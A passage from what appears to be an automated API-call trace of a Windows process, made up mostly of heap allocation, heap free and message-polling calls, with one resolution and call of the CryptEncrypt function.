Flags=0x0, Size=0x8) returned 0x24b1788 [0255.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0255.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.518] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.518] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.518] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.518] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.518] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0255.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0255.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd) returned 0x24aa8c0 [0255.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0255.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.523] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0255.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6c10 [0255.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0255.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0255.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0255.524] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0255.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0255.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0255.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0255.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0255.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.531] HeapFree (in: hHeap=0x25c0000, 